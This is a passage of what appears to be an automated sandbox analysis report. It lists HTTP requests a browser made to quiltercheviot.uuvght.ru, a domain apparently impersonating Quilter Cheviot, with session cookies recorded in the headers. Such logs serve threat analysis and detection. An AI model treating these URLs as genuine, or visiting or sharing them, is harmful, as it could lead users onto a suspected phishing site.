Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://quiltercheviot.uuvght.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /GDSherpa-vf.woff2 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveOrigin: https://quiltercheviot.uuvght.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /GDSherpa-vf2.woff2 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveOrigin: https://quiltercheviot.uuvght.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /34ffrvM4h24NzkkyD6SwzVMu9WijuexAcp9VzMOlBVr67107 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /kljLcPWShXHXVYYUU12tSUDv56HXYBL0GF0xXh47yqPLMdA7Eah01QPwx220 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /klet11CCZk79YbQutqnTSKM1JZecexnomL2CqqrpyZHGyJ74c2fkogJFPjUKjFZ1HDbo2ab224 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /klet11CCZk79YbQutqnTSKM1JZecexnomL2CqqrpyZHGyJ74c2fkogJFPjUKjFZ1HDbo2ab224 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /kljLcPWShXHXVYYUU12tSUDv56HXYBL0GF0xXh47yqPLMdA7Eah01QPwx220 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /wxEAvfh79xY931O7OkQQ5DeTPrst9wZU0uuvZgKtV34130 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /qrP6RmVW07q5q2IzmAMefCmNGikm8kh7E6AP45140 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /efxsGgZ9g96NYVuIvRwEYQSx0A8SVy5blklUrKSSj9iyc6co8Jt78146 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklEcEpUVWNFMXBkYjJHTWlCS3I0SkE9PSIsInZhbHVlIjoiRU5TWmM4SmZCQWszMmw4QVZaKzNLN3d3eU56K29ramVmeFNFRWhPeUpYMGFPTHowYUVRbjdPbllvUVVVV3dKV0U1VTE3ZE1TOFRkUmpjdVcxV05VNWFXODdyWWdyeEhmNlRUOWk1TFc3U3Q1VkRqTEx1YmNLMjRMOHQwQXo1TWIiLCJtYWMiOiJmYmY5ZDcwMzU5MzEwN2M3Zjg3ODZmNjY3ZGJlNDI4M2JhZGM2OWJkYzU5ZDY3MDRlZWYyNmQxZjM4OTIwODAxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZVbXloM1A5Q2JZSWFPd0FJWDBGVWc9PSIsInZhbHVlIjoiZk5xODExV05VQVgwQnp0dHFVd0JmTHVQQTdtajBTaEQ5U3hIb0k1M3lnblE2ekxreFdXb3hYU2JRZndCWFZ5VWRzZ3JFdjlOWHhVQnhVZ0Z1Nkl4dFBHdWNBdlBkSEVNOEJYWXRDNVhaU1A3NFZ2bGcrZVc4dXBSSHlmdzcxWnYiLCJtYWMiOiJmOTVjYmMyZTNlNjQyZTFmMWM2ZDMxMTA5ZWFmZDk5Nzk5ZjVlZDMzYzEyMDNjYWYxYTdhNWExZjA3OWE2Y2FhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /ij4ju2f5snoNTxMCJrxIedZBHZMU2Iz4yXZa0cdKQl2fDm9jTZe4c7rlVqysESBB56169 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklEcEpUVWNFMXBkYjJHTWlCS3I0SkE9PSIsInZhbHVlIjoiRU5TWmM4SmZCQWszMmw4QVZaKzNLN3d3eU56K29ramVmeFNFRWhPeUpYMGFPTHowYUVRbjdPbllvUVVVV3dKV0U1VTE3ZE1TOFRkUmpjdVcxV05VNWFXODdyWWdyeEhmNlRUOWk1TFc3U3Q1VkRqTEx1YmNLMjRMOHQwQXo1TWIiLCJtYWMiOiJmYmY5ZDcwMzU5MzEwN2M3Zjg3ODZmNjY3ZGJlNDI4M2JhZGM2OWJkYzU5ZDY3MDRlZWYyNmQxZjM4OTIwODAxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZVbXloM1A5Q2JZSWFPd0FJWDBGVWc9PSIsInZhbHVlIjoiZk5xODExV05VQVgwQnp0dHFVd0JmTHVQQTdtajBTaEQ5U3hIb0k1M3lnblE2ekxreFdXb3hYU2JRZndCWFZ5VWRzZ3JFdjlOWHhVQnhVZ0Z1Nkl4dFBHdWNBdlBkSEVNOEJYWXRDNVhaU1A3NFZ2bGcrZVc4dXBSSHlmdzcxWnYiLCJtYWMiOiJmOTVjYmMyZTNlNjQyZTFmMWM2ZDMxMTA5ZWFmZDk5Nzk5ZjVlZDMzYzEyMDNjYWYxYTdhNWExZjA3OWE2Y2FhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /xhSSG433q0vLfXw282T0j4tZVT2ieEywR92lVD7p2BPMjtlA0PeiEbuzk HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklEcEpUVWNFMXBkYjJHTWlCS3I0SkE9PSIsInZhbHVlIjoiRU5TWmM4SmZCQWszMmw4QVZaKzNLN3d3eU56K29ramVmeFNFRWhPeUpYMGFPTHowYUVRbjdPbllvUVVVV3dKV0U1VTE3ZE1TOFRkUmpjdVcxV05VNWFXODdyWWdyeEhmNlRUOWk1TFc3U3Q1VkRqTEx1YmNLMjRMOHQwQXo1TWIiLCJtYWMiOiJmYmY5ZDcwMzU5MzEwN2M3Zjg3ODZmNjY3ZGJlNDI4M2JhZGM2OWJkYzU5ZDY3MDRlZWYyNmQxZjM4OTIwODAxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZVbXloM1A5Q2JZSWFPd0FJWDBGVWc9PSIsInZhbHVlIjoiZk5xODExV05VQVgwQnp0dHFVd0JmTHVQQTdtajBTaEQ5U3hIb0k1M3lnblE2ekxreFdXb3hYU2JRZndCWFZ5VWRzZ3JFdjlOWHhVQnhVZ0Z1Nkl4dFBHdWNBdlBkSEVNOEJYWXRDNVhaU1A3NFZ2bGcrZVc4dXBSSHlmdzcxWnYiLCJtYWMiOiJmOTVjYmMyZTNlNjQyZTFmMWM2ZDMxMTA5ZWFmZDk5Nzk5ZjVlZDMzYzEyMDNjYWYxYTdhNWExZjA3OWE2Y2FhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /wxw1sZOySil8NEjvIYFtxD8u66tYQYXgQQAmnPjgqr0tgkbNH5Tke3Rab171 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklEcEpUVWNFMXBkYjJHTWlCS3I0SkE9PSIsInZhbHVlIjoiRU5TWmM4SmZCQWszMmw4QVZaKzNLN3d3eU56K29ramVmeFNFRWhPeUpYMGFPTHowYUVRbjdPbllvUVVVV3dKV0U1VTE3ZE1TOFRkUmpjdVcxV05VNWFXODdyWWdyeEhmNlRUOWk1TFc3U3Q1VkRqTEx1YmNLMjRMOHQwQXo1TWIiLCJtYWMiOiJmYmY5ZDcwMzU5MzEwN2M3Zjg3ODZmNjY3ZGJlNDI4M2JhZGM2OWJkYzU5ZDY3MDRlZWYyNmQxZjM4OTIwODAxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZVbXloM1A5Q2JZSWFPd0FJWDBGVWc9PSIsInZhbHVlIjoiZk5xODExV05VQVgwQnp0dHFVd0JmTHVQQTdtajBTaEQ5U3hIb0k1M3lnblE2ekxreFdXb3hYU2JRZndCWFZ5VWRzZ3JFdjlOWHhVQnhVZ0Z1Nkl4dFBHdWNBdlBkSEVNOEJYWXRDNVhaU1A3NFZ2bGcrZVc4dXBSSHlmdzcxWnYiLCJtYWMiOiJmOTVjYmMyZTNlNjQyZTFmMWM2ZDMxMTA5ZWFmZDk5Nzk5ZjVlZDMzYzEyMDNjYWYxYTdhNWExZjA3OWE2Y2FhIiwidGFnIjoiIn0%3D
